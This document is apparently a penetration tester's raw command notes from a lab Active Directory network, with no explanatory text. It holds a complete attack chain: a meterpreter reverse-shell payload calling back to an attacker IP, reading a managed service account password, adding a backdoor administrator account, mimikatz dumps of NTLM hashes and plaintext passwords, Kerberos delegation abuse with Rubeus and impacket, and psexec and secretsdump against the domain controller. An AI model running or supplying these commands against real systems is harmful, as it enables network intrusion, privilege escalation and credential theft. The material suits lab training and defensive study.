Logging in as Offshore_adm
proxychains -f proxychains4.conf xfreerdp /u:offshore_adm /p:'Banker!123' /v:172.16.4.31
Generating msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.149 LPORT=4449 -f exe > prompt.exe
Uploading it on the Computer
Read GMSA password
get-adserviceaccount SVC_CLIENT_SEC
get-adserviceaccount SVC_CLIENT_SEC -properties 'msDS-ManagedPassword'
$gmsa = get-adserviceaccount SVC_CLIENT_SEC -properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
$secpwd = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential "SVC_CLIENT_SEC",$secpwd
Invoke-Command -ComputerName 127.0.0.1 -cred $cred -SCriptBlock {whoami}
Invoke-Command -ComputerName 127.0.0.1 -cred $cred -SCriptBlock {powershell C:\Users\offshore_adm\Desktop\prompt.exe}
PS C:\Users\offshore_adm\Desktop> Invoke-Command -ComputerName 127.0.0.1 -cred $cred -SCriptBlock {powershell C:\Users\offshore_adm\Desktop\prompt.exe}
Enter-PSSession -ComputerName MS02 -cred $cred
net user ipsec TryHarder.123! /add
net localgroup Administrators ipsec /ADD
net localgroup "Remote Desktop Users" ipsec /add
proxychains -f proxychains4.conf xfreerdp /u:ipsec /p:'TryHarder.123!' /v:172.16.4.31
mimikatz # lsadump::sam
Domain : MS02
SysKey : 2bb3b90874b685ecc2dff677a6cb2d3c
Local SID : S-1-5-21-86684712-58618190-611843015
SAMKey : 3b7e5b7801294cb2a81e36f470de5a89
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 7facdc498ed1680c4fd1448319a8c04f
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000003e9 (1001)
User : cleaner
Hash NTLM: 6f97c037d2655e16c9dd6790b143a845
lm - 0: 822a86e87ea5612eb0c48a926ec0a3a8
ntlm- 0: 6f97c037d2655e16c9dd6790b143a845
RID : 000003ea (1002)
User : ipsec
Hash NTLM: ad593e9fb0bf68a7b25651a8b73a1ea1
lm - 0: 7834993eae9d79ce6f25c5819d824b9a
ntlm- 0: ad593e9fb0bf68a7b25651a8b73a1ea1
credman :
[00000000]
* Username : CLIENT\offshore_adm
* Domain : CLIENT\offshore_adm
* Password : Banker!123
[00000001]
* Username : cleaner
* Domain : cleaner
* Password : Cleanup_Cleanup!
[00000002]
* Username : offshore_adm
* Domain : offshore_adm
* Password : Banker!123
[00000003] Primary
* Username : MS02$
* Domain : CLIENT
* NTLM : dc7a49c0c36399ae87f3de623ebab985
* SHA1 : 7598cf051bb29bbd4cb2b794e481f42a16cb9010
The ticket value is the base64 ticket obtained with Rubeus's tgtdeleg
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
.\Rubeus.exe s4u /ticket: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 /impersonateuser:administrator /domain:client.offshore.com /msdsspn:cifs/dc04.client.offshore.com /dc:dc04.client.offshore.com /ptt
Get-NetComputer ms02 | select name, msds-allowedtodelegateto, useraccountcontrol | fl
Get-NetComputer ms02 | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
.\Rubeus.exe s4u /ticket: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 /impersonateuser:administrator /domain:client.offshore.com /msdspn:cifs/DC04.CLIENT>OFFSHORE.COM /dc:DC04.client.offshore.com /ptt
proxychains -f proxychains4.conf impacket-addcomputer -method SAMR -computer-pass 'Summer2018!' -computer-name attackersystem 'client.offshore.com/offshore_adm:Banker!123'
$ComputerSid = Get-DomainComputer rbcdTest -Properties objectsid | Select -Expand objectsid
Get-DomainComputer DC04.client.offshore.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
proxychains -f proxychains4.conf impacket-getST -spn 'cifs/DC04' -impersonate Administrator -dc-ip 172.16.4.5 'client.offshore.com/MS02$' -hashes :dc7a49c0c36399ae87f3de623ebab985
proxychains -f proxychains4.conf impacket-psexec client.offshore.com/Administrator@dc04.client.offshore.com -k -no-pass -target-ip 172.16.4.5
proxychains -f proxychains4.conf impacket-getST -spn 'cifs/DC04.client.offshore.com' -impersonate Administrator -dc-ip 172.16.4.5 'client.offshore.com/MS02$' -hashes :dc7a49c0c36399ae87f3de623ebab985
export KRB5CCNAME=Administrator.ccache
proxychains -f proxychains4.conf impacket-psexec -dc-ip 172.16.4.5 -target-ip 172.16.4.5 -no-pass -k client.offshore.com/administrator@DC04.client.offshore.com
proxychains -f proxychains4.conf impacket-secretsdump -dc-ip 172.16.4.5 -target-ip 172.16.4.5 -no-pass -k client.offshore.com/administrator@DC04.client.offshore.com